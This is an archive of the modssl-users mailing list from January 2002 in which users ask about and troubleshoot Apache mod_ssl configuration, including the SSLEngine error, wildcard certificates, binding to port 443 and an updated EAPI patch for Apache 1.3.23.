10:10:53 -0500 (EST) Received: by va9nt1.dyncorp.com with Internet Mail Service (5.5.2653.19) id ; Mon, 28 Jan 2002 10:03:53 -0500 Message-ID: <2F15531C24354A4DBF4F5CE867D27CE3B30723@va9ex2nt> From: "Ho, Alexander" To: "'modssl-users@modssl.org'" Subject: Invalid Command SSLEngine Date: Mon, 28 Jan 2002 10:04:15 -0500 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2653.19) Content-Type: text/plain; charset="iso-8859-1" Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Ho, Alexander" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hi, I followed the directions at: http://www.galatea.com/flashguides/apache-ssl-win32.xml to configure my NT to host a SSL apache server. I have repeated all the steps twice, still got into the problem, when started apached with "apache -D SSL", of Invalid command 'SSLEngine'. Does anyone know why? Please help. Best Regards ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Mon Jan 28 19:03:46 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id TAA01110; Mon, 28 Jan 2002 19:02:35 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id TAA01035; Mon, 28 Jan 2002 19:00:43 +0100 (MET) Received: by visp.engelschall.com (Postfix, from userid 1005) id D04F54CE698; Mon, 28 Jan 2002 19:00:41 +0100 (CET) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org id g0SGh6e21209; Mon, 28 Jan 2002 17:43:06 +0100 (CET) Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for from mx0.gmx.net id KAA03096; Mon, 28 Jan 2002 10:00:27 +0100 (MET) From: hekiman@gmx.at Received: (qmail 17025 invoked by uid 0); 28 Jan 2002 09:00:20 -0000 Date: Mon, 28 Jan 2002 10:00:20 +0100 (MET) To: modssl-users@modssl.org MIME-Version: 1.0 References: <20020121184917.A6497449@ohm.arago.de> Subject: Re: ensure 128 bit encryption X-Priority: 3 (Normal) X-Authenticated-Sender: #0012464649@gmx.net X-Authenticated-IP: [195.248.40.88] Message-ID: <11131.1012208420@www56.gmx.net> X-Mailer: WWW-Mail 1.5 (Global Message Exchange) X-Flags: 0001 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: hekiman@gmx.at X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users > > Try the following (inside ... > SSLOptions +StdEnvVars > RewriteBase absolute-filesystem-path-to-directory > RewriteCond %{ENV:SSL_CIPHER_EXPORT} "^true$" > RewriteRule ".*" /noexport.html > > Now, when someone accesses your directory with an export browser, > (s)he will be redirected to the page /noexport.html, which may > then explain what's wrong. > nice try, but we have another problem. we use a global certificate, so export browsers have! 128 bit. only very old browsers use <128 bit. so this also doesn't work. -- GMX - Die Kommunikationsplattform im Internet. http://www.gmx.net ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Mon Jan 28 19:03:54 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id TAA01129; Mon, 28 Jan 2002 19:02:59 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id TAA01031; Mon, 28 Jan 2002 19:00:43 +0100 (MET) Received: by visp.engelschall.com (Postfix, from userid 1005) id C07E94CE695; Mon, 28 Jan 2002 19:00:41 +0100 (CET) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org id g0SGgwR21203; Mon, 28 Jan 2002 17:42:58 +0100 (CET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from www.linux.org.uk id IAA29439; Mon, 28 Jan 2002 08:36:28 +0100 (MET) Received: from willy by www.linux.org.uk with local (Exim 3.33 #5) id 16V6Kw-0008O9-00 for modssl-users@modssl.org; Mon, 28 Jan 2002 07:36:18 +0000 Date: Mon, 28 Jan 2002 07:36:18 +0000 From: Matthew Wilcox To: modssl-users@modssl.org Subject: Updated EAPI patch against 1.3.23 Message-ID: <20020128073618.I19804@parcelfarce.linux.theplanet.co.uk> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5.1i Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Matthew Wilcox X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hi, I took over from Johnie as Debian Apache maintainer in late December. I have a number of users hassling me to get a 1.3.23 release out, so I've attempted to update the EAPI patch for 1.3.23 in an effort to please them. It applies (with fuzz and offsets) to 1.3.23, but I have a number of other patches to fix up for 1.3.23 before I can build. Some notes: - several functions which were turned into API_EXPORT by EAPI are now API_EXPORT upstream. Yay. These also have to be removed from ApacheCore.def, of course. - A lot of tabs got changed to spaces. - A certain amount of stuff changed on the periphery of a hunk. Much less hard than some merges I've had to deal with in the past... though I'm pretty unfamiliar with this codebase, so I hope I did the right thing. Since I'm not sure what the policy of this mailing list is on sending 60k attachments, I've made it available from http://ftp.uk.linux.org/pub/linux/people/willy/apache/ Thanks. I'm not subscribed to this list, so please cc me in followups. -- Revolutions do not require corporate support. ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Mon Jan 28 21:24:11 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id VAA08774; Mon, 28 Jan 2002 21:23:33 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id VAA08736; Mon, 28 Jan 2002 21:22:30 +0100 (MET) Received: by visp.engelschall.com (Postfix, from userid 1005) id D27614CE731; Mon, 28 Jan 2002 21:22:29 +0100 (CET) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org id g0SKLgt30672; Mon, 28 Jan 2002 21:21:42 +0100 (CET) Date: Mon, 28 Jan 2002 21:21:42 +0100 From: "Ralf S. Engelschall" To: modssl-users@modssl.org Subject: Re: ??? 1.3.23 Message-ID: <20020128202142.GA30295@engelschall.com> References: <20020128061511.GA13221@engelschall.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <20020128061511.GA13221@engelschall.com> User-Agent: Mutt/1.3.24i Organization: Engelschall, Germany. X-Web-Homepage: http://www.engelschall.com/ X-PGP-Public-Key: https://www.engelschall.com/ho/rse/pgprse.asc X-PGP-Fingerprint: 00 C9 21 8E D1 AB 70 37 DD 67 A2 3A 0A 6F 8D A5 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Ralf S. Engelschall" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users On Mon, Jan 28, 2002, Ralf S. Engelschall wrote: > > [...] > > And, the mod_ssl I get from CVS is for 1.3.20, which is *less* than the > > one that is downloadable already built for 1.3.22, shooting holes in my > > initial theory that going to the CVS was even getting me closer to now... > > Ops, my fault. The rsync cronjob was broken which updated the CVS copy > from my master machine. Now fixed. > > For Apache 1.3.23: Expect an mod_ssl update for 1.3.23 within the next > days. The mod_ssl CVS not got Apache 1.3.23 imporated and the patch set was updated. I'm still incorporating other bugfixes before 2.8.6 will be released the next days. In the meantime you already can find the latest CVS state as mod_ssl-SNAP-20020128.tar.gz (or any newer) on the FTP server. Ralf S. Engelschall rse@engelschall.com www.engelschall.com ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Jan 29 01:58:08 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id BAA22702; Tue, 29 Jan 2002 01:57:30 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from daedalus.andrew.net.au id BAA22657; Tue, 29 Jan 2002 01:56:23 +0100 (MET) Received: from daedalus.andrew.net.au (www-data@localhost [127.0.0.1]) by daedalus.andrew.net.au (8.12.1/8.12.1/Debian -2) with ESMTP id g0T0uINB029643 (version=TLSv1/SSLv3 cipher=EDH-RSA-DES-CBC3-SHA bits=168 verify=FAIL) for ; Tue, 29 Jan 2002 10:56:18 +1000 Received: (from www-data@localhost) by daedalus.andrew.net.au (8.12.1/8.12.1/Debian -2) id g0T0uGKu029642 for modssl-users@modssl.org; Tue, 29 Jan 2002 10:56:16 +1000 Date: Tue, 29 Jan 2002 10:56:16 +1000 Message-Id: <200201290056.g0T0uGKu029642@daedalus.andrew.net.au> X-Mailer: JAWmail 0.9.17 X-Originating-IP: 203.220.27.98 From: Andrew Pollock To: modssl-users@modssl.org Subject: Wildcard certificates MIME-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Andrew Pollock X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hi, Please direct me to the OpenSSL mailing list if this question is more appropriate over there... I'm trying to roll my own wildcard certificate (i.e. where the CN = *.domain.com) I'm assuming there's more to it than just putting an asterisk in the CN field? Any pointeres appreciated. I've googled like crazy and found a lot of questions but nothing really helpful in the answer department... Andrew ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Jan 29 02:10:14 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id CAA23349; Tue, 29 Jan 2002 02:10:04 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from anger.verticalscope.com id CAA23252; Tue, 29 Jan 2002 02:07:39 +0100 (MET) Received: by anger.verticalscope.com (Postfix, from userid 1027) id 83B727E31; Mon, 28 Jan 2002 20:09:23 -0500 (EST) Received: from localhost (localhost [127.0.0.1]) by anger.verticalscope.com (Postfix) with ESMTP id 824313EA3 for ; Mon, 28 Jan 2002 20:09:23 -0500 (EST) Date: Mon, 28 Jan 2002 20:09:23 -0500 (EST) From: "Julian C. Dunn" To: modssl-users@modssl.org Subject: Re: Wildcard certificates In-Reply-To: <200201290056.g0T0uGKu029642@daedalus.andrew.net.au> Message-ID: <20020128200724.U50641-100000@anger.verticalscope.com> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Julian C. Dunn" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users On Tue, 29 Jan 2002, Andrew Pollock wrote: > I'm trying to roll my own wildcard certificate (i.e. where the CN = > *.domain.com) > > I'm assuming there's more to it than just putting an asterisk in the CN > field? Nope... there's no more to it than that. At least that's the experience I've had. Apache will complain (warn) that your CN doesn't match the name of the server, but everything works fine. I'm using Apache 1.3.12 with modssl 2.6.6. - Julian ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Jan 29 05:31:04 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id FAA02694; Tue, 29 Jan 2002 05:30:16 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from daedalus.andrew.net.au id FAA02664; Tue, 29 Jan 2002 05:29:42 +0100 (MET) Received: from daedalus.andrew.net.au (www-data@localhost [127.0.0.1]) by daedalus.andrew.net.au (8.12.1/8.12.1/Debian -2) with ESMTP id g0T4TcNB031463 (version=TLSv1/SSLv3 cipher=EDH-RSA-DES-CBC3-SHA bits=168 verify=FAIL) for ; Tue, 29 Jan 2002 14:29:38 +1000 Received: (from www-data@localhost) by daedalus.andrew.net.au (8.12.1/8.12.1/Debian -2) id g0T4Tbjo031462 for modssl-users@modssl.org; Tue, 29 Jan 2002 14:29:37 +1000 Date: Tue, 29 Jan 2002 14:29:37 +1000 Message-Id: <200201290429.g0T4Tbjo031462@daedalus.andrew.net.au> In-Reply-To: <20020128200724.U50641-100000@anger.verticalscope.com> References: <20020128200724.U50641-100000@anger.verticalscope.com> X-Mailer: JAWmail 0.9.17 X-Originating-IP: 203.220.27.98 From: Andrew Pollock To: Subject: Re: Wildcard certificates MIME-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Andrew Pollock X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users On 29.01.2002 at 11:12:02, "Julian C. Dunn" wrote: > On Tue, 29 Jan 2002, Andrew Pollock wrote: > > > I'm trying to roll my own wildcard certificate (i.e. where the CN = > > *.domain.com) > > > > I'm assuming there's more to it than just putting an asterisk in the CN > > field? > > Nope... there's no more to it than that. At least that's the experience > I've had. Apache will complain (warn) that your CN doesn't match the name > of the server, but everything works fine. I'm using Apache 1.3.12 with > modssl 2.6.6. Hmm, I'm not aware of any complaints from Apache, however Internet Explorer (6) is complaining that the name on the certificate doesn't match the hostname... Andrew ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Jan 29 05:45:07 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id FAA03071; Tue, 29 Jan 2002 05:44:11 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from anger.verticalscope.com id FAA03043; Tue, 29 Jan 2002 05:43:28 +0100 (MET) Received: by anger.verticalscope.com (Postfix, from userid 1027) id 45AB57E09; Mon, 28 Jan 2002 23:45:14 -0500 (EST) Received: from localhost (localhost [127.0.0.1]) by anger.verticalscope.com (Postfix) with ESMTP id 446E53EA3 for ; Mon, 28 Jan 2002 23:45:14 -0500 (EST) Date: Mon, 28 Jan 2002 23:45:14 -0500 (EST) From: "Julian C. Dunn" To: modssl-users@modssl.org Subject: Re: Wildcard certificates In-Reply-To: <200201290429.g0T4Tbjo031462@daedalus.andrew.net.au> Message-ID: <20020128234231.U53129-100000@anger.verticalscope.com> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Julian C. Dunn" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users On Tue, 29 Jan 2002, Andrew Pollock wrote: > On 29.01.2002 at 11:12:02, "Julian C. Dunn" wrote: > > > Nope... there's no more to it than that. At least that's the experience > > I've had. Apache will complain (warn) that your CN doesn't match the name > > of the server, but everything works fine. I'm using Apache 1.3.12 with > > modssl 2.6.6. > > Hmm, I'm not aware of any complaints from Apache, however Internet > Explorer (6) is complaining that the name on the certificate doesn't > match the hostname... Is that when you go to https://sitename.com as opposed to https://www.sitename.com/? In the former case, I believe the wildcard will not work because there is nothing for the "*" to match. Of course, you could just write a mod_rewrite rule (or use another such mechanism) to force people to use the latter version. - Julian -- Julian C. Dunn, B.A.Sc Senior Software Developer, VerticalScope Inc. Tel.: (416) 341-8950 x236 Fax: (416) 341-8959 WWW: www.verticalscope.com "Windows NT encountered the following error: The operation was completed successfully." ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Jan 29 09:00:50 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id IAA11328; Tue, 29 Jan 2002 08:59:59 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id IAA11274; Tue, 29 Jan 2002 08:58:44 +0100 (MET) Received: by visp.engelschall.com (Postfix, from userid 1005) id 4FFE64CE741; Tue, 29 Jan 2002 08:58:43 +0100 (CET) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org id g0T7tnR40551; Tue, 29 Jan 2002 08:55:49 +0100 (CET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from zircon.bhl.com.au id EAA29744; Tue, 29 Jan 2002 04:17:30 +0100 (MET) Received: by ZIRCON with Internet Mail Service (5.5.2653.19) id ; Tue, 29 Jan 2002 14:16:32 +1100 Message-ID: <31A657F37655D111B31300A0C955187501C21C0C@ZIRCON> From: David Hsu To: "'modssl-users@modssl.org'" Subject: Cannot seem to bind to port 443? Date: Tue, 29 Jan 2002 14:16:32 +1100 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2653.19) Content-Type: text/plain; charset="iso-8859-1" Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: David Hsu X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hi All, This looks like a simple problem but somehow I cannot locate the source (let alone finding the solution). :( Any ideas/feedback appreciated. Note that I'd be a bit hesitatant to start upgrading the various components - the current setup used to work fine on both production and test, now for some reason the test server does not work at all (but production still does). :( Anyway, here's the juice: The server (tb1.anstat.com.au) has a virtual server (intertest.anstat.com.au). I've created a self signed certificate for intertest.anstat.com.au and installed it. ======================== ServerName intertest.anstat.com.au LogLevel debug ErrorLog logs/anstat_com_ssl-error CustomLog logs/anstat_com_ssl-access common SSLEngine On SSLCertificateFile /etc/httpd/conf/intertest.anstat.com.au.crt SSLCertificateKeyFile /etc/httpd/conf/intertest.anstat.com.au.key ======================= After apache is started, there's absolutely no error message anywhere. However httpd does not seem to bind to port 443 at all? (checked using netstat -anp | grep "443") There is NO firewall installed on this server. Connecting to https via browser fails obviously. telnet localhost 443 also fails. Configurations: [root@thunderbird1 logs]# uname -a Linux thunderbird1 2.2.16 #2 Tue Dec 5 18:31:26 EST 2000 i686 unknown [root@thunderbird1 logs]# tail -2 error_log [Tue Jan 29 14:03:31 2002] [notice] Apache/1.3.12 (Unix) (Red Hat/Linux) mod_jk mod_ssl/2.6.6 OpenSSL/0.9.5a PHP/4.0.3pl1 configured [root@thunderbird1 logs]# httpd -S 192.168.221.63:80 is a NameVirtualHost default server tb1.anstat.com.au (/etc/httpd/conf/tomcat-apache.conf:9) port 80 namevhost intertest.anstat.com.au (/etc/httpd/conf/tomcat-apache.conf:48) 192.168.221.63:443 intertest.anstat.com.au (/etc/httpd/conf/tomcat-apache.conf:74) Thanks in advance, cheers, David Hsu Anstat Property Group mailto:davidh@anstat.com.au 224-226 Normanby Road, Southbank 3006 tel:+61 3 92781174 Victoria, Australia fax:+61 3 92781167 ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Jan 29 09:13:04 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id JAA12408; Tue, 29 Jan 2002 09:12:10 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from bull1.bourse.ch id JAA12391; Tue, 29 Jan 2002 09:11:25 +0100 (MET) Received: (from nobody@localhost) by bull1.bourse.ch (8.8.8+Sun/8.8.8) id JAA14274 for ; Tue, 29 Jan 2002 09:11:20 +0100 (MET) X-Authentication-Warning: bull1.bourse.ch: nobody set sender to using -f Received: from trifid2(172.20.196.132) by bull1 via smap (V2.1) id xma014250; Tue, 29 Jan 02 09:11:15 +0100 Received: from regulus.bourse.ch (regulus [172.20.196.148]) by trifid2.bourse.ch (8.8.8+Sun/8.8.8) with ESMTP id JAA21922 for ; Tue, 29 Jan 2002 09:11:14 +0100 (MET) Received: from bourse.ch (localhost [127.0.0.1]) by regulus.bourse.ch (8.9.3+Sun/8.9.3) with ESMTP id JAA21429 for ; Tue, 29 Jan 2002 09:11:13 +0100 (MET) Message-ID: <3C565921.7E600FCC@bourse.ch> Date: Tue, 29 Jan 2002 09:11:13 +0100 From: Owen Boyle X-Mailer: Mozilla 4.76 [en] (X11; U; SunOS 5.8 sun4u) X-Accept-Language: en MIME-Version: 1.0 To: modssl-users@modssl.org Subject: Re: Cannot seem to bind to port 443? References: <31A657F37655D111B31300A0C955187501C21C0C@ZIRCON> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Owen Boyle X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users David Hsu wrote: > > After apache is started, there's absolutely no error message anywhere. > However httpd does not seem to bind to port 443 at all? (checked using > netstat -anp | grep "443") There is NO firewall installed on this server. > Connecting to https via browser fails obviously. telnet localhost 443 also > fails. Um... starting with the simplest question first: You did start apache with; apachectl startssl or httpd -DSSL didn't you? Does the plain http server on port 80 work? Rgds, Owen Boyle. ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Jan 29 09:16:06 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id JAA12510; Tue, 29 Jan 2002 09:15:23 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from area.alsernet.es id JAA12485; Tue, 29 Jan 2002 09:14:46 +0100 (MET) Received: from cinos1.grupoalser.com (213-96-224-53.uc.nombres.ttd.es [213.96.224.53]) by area.alsernet.es (Postfix) with ESMTP id E438BC6D5A for ; Tue, 29 Jan 2002 09:17:14 +0100 (CET) Date: Tue, 29 Jan 2002 09:14:43 +0100 From: Administrador X-Mailer: The Bat! (v1.53d) Organization: Alsernet 2000 X-Priority: 3 (Normal) Message-ID: <7754738399.20020129091443@alsernet.es> To: modssl-users@modssl.org Subject: New mod_ssl user MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 8bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Administrador X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hello, Just a question. Can I use mod-ssl 1.3.22 with Apache 1.3.23? Thanks. -- Administrador Técnico Alsernet 2000 http://www.alsernet.es ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Jan 29 11:41:13 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id LAA18513; Tue, 29 Jan 2002 11:40:14 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from mail-relay1.sift.co.uk id LAA18493; Tue, 29 Jan 2002 11:39:57 +0100 (MET) Received: by mail-relay1.sift.co.uk (Postfix, from userid 682) id E84A756986; Tue, 29 Jan 2002 10:39:50 +0000 (GMT) Received: from sift.co.uk (sleazy.office.sift.co.uk [172.17.64.10]) by mail-relay1.sift.co.uk (Postfix) with ESMTP id 1B66B528EC for ; Tue, 29 Jan 2002 10:39:50 +0000 (GMT) Message-ID: <3C567BF6.4080703@sift.co.uk> Date: Tue, 29 Jan 2002 10:39:50 +0000 From: Andy Osborne Organization: Sift Group User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-GB; rv:0.9.4) Gecko/20011019 Netscape6/6.2 X-Accept-Language: en-gb, en-us MIME-Version: 1.0 To: modssl-users@modssl.org Subject: Re: Cannot seem to bind to port 443? References: <31A657F37655D111B31300A0C955187501C21C0C@ZIRCON> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-AntiVirus: mail-relay1 scanned for viruses by AMaViS 0.2.1 (http://amavis.org/) Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Andy Osborne X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users David Hsu wrote: > Hi All, > [snip] > > > ServerName intertest.anstat.com.au > > LogLevel debug > ErrorLog logs/anstat_com_ssl-error > CustomLog logs/anstat_com_ssl-access common > > SSLEngine On > SSLCertificateFile /etc/httpd/conf/intertest.anstat.com.au.crt > SSLCertificateKeyFile /etc/httpd/conf/intertest.anstat.com.au.key > > ======================= > > After apache is started, there's absolutely no error message anywhere. > However httpd does not seem to bind to port 443 at all? (checked using > netstat -anp | grep "443") There is NO firewall installed on this server. > Connecting to https via browser fails obviously. telnet localhost 443 also > fails. Try... Listen 192.168.221.63:443 ServerName intertest.anstat.com.au .... etc Andy -- Andy Osborne **************** "Vertical B2B Communities" Senior Internet Engineer Sift Group Ltd. 100 Victoria Street, Bristol BS1 6HZ tel:+44 117 915 9600 fax:+44 117 915 9630 http://www.sift.co.uk ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Jan 29 14:06:05 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id OAA26836; Tue, 29 Jan 2002 14:05:10 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from daedalus.andrew.net.au id OAA26788; Tue, 29 Jan 2002 14:04:24 +0100 (MET) Received: from daedalus.andrew.net.au (www-data@localhost [127.0.0.1]) by daedalus.andrew.net.au (8.12.1/8.12.1/Debian -2) with ESMTP id g0TD4LNB010230 (version=TLSv1/SSLv3 cipher=EDH-RSA-DES-CBC3-SHA bits=168 verify=FAIL) for ; Tue, 29 Jan 2002 23:04:21 +1000 Received: (from www-data@localhost) by daedalus.andrew.net.au (8.12.1/8.12.1/Debian -2) id g0TD4JKP010229 for modssl-users@modssl.org; Tue, 29 Jan 2002 23:04:20 +1000 Date: Tue, 29 Jan 2002 23:04:20 +1000 Message-Id: <200201291304.g0TD4JKP010229@daedalus.andrew.net.au> In-Reply-To: <20020128234231.U53129-100000@anger.verticalscope.com> References: <20020128234231.U53129-100000@anger.verticalscope.com> X-Mailer: JAWmail 0.9.17 X-Originating-IP: 144.137.137.79 From: Andrew Pollock To: Subject: Re: Wildcard certificates MIME-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Andrew Pollock X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users On 29.01.2002 at 14:46:30, "Julian C. Dunn" wrote: > On Tue, 29 Jan 2002, Andrew Pollock wrote: > > > On 29.01.2002 at 11:12:02, "Julian C. Dunn" wrote: > > > > > Nope... there's no more to it than that. At least that's the experience > > > I've had. Apache will complain (warn) that your CN doesn't match the name > > > of the server, but everything works fine. I'm using Apache 1.3.12 with > > > modssl 2.6.6. > > > > Hmm, I'm not aware of any complaints from Apache, however Internet > > Explorer (6) is complaining that the name on the certificate doesn't > > match the hostname... > > Is that when you go to https://sitename.com as opposed to > https://www.sitename.com/? In the former case, I believe the wildcard will > not work because there is nothing for the "*" to match. No, it's two subdomains of the same domain. https://ops.suretyit.com.au/ https://sales.suretyit.com.au/ I want a certificate where I'm the CA that behaves like the one at https://registry.connect.com.au/ > Of course, you could just write a mod_rewrite rule (or use another such > mechanism) to force people to use the latter version. ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Jan 29 14:35:06 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id OAA27938; Tue, 29 Jan 2002 14:34:12 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from anger.verticalscope.com id OAA27932; Tue, 29 Jan 2002 14:34:02 +0100 (MET) Received: by anger.verticalscope.com (Postfix, from userid 1027) id 3390C7DFF; Tue, 29 Jan 2002 08:35:50 -0500 (EST) Received: from localhost (localhost [127.0.0.1]) by anger.verticalscope.com (Postfix) with ESMTP id 311E03EA3 for ; Tue, 29 Jan 2002 08:35:50 -0500 (EST) Date: Tue, 29 Jan 2002 08:35:50 -0500 (EST) From: "Julian C. Dunn" To: modssl-users@modssl.org Subject: Re: Wildcard certificates In-Reply-To: <200201291304.g0TD4JKP010229@daedalus.andrew.net.au> Message-ID: <20020129083415.H57092-100000@anger.verticalscope.com> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Julian C. Dunn" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users On Tue, 29 Jan 2002, Andrew Pollock wrote: > No, it's two subdomains of the same domain. > > https://ops.suretyit.com.au/ > https://sales.suretyit.com.au/ That's because you're trying to use a cert that has its CN as *.singtech.com.au, and the site(s) you are using it on are *.suretyit.com.au. - Julian -- Julian C. Dunn, B.A.Sc Senior Software Developer, VerticalScope Inc. Tel.: (416) 341-8950 x236 Fax: (416) 341-8959 WWW: www.verticalscope.com "Windows NT encountered the following error: The operation was completed successfully." ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Jan 29 19:15:37 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id SAA20917; Tue, 29 Jan 2002 18:47:27 +0100 (MET) Received: by 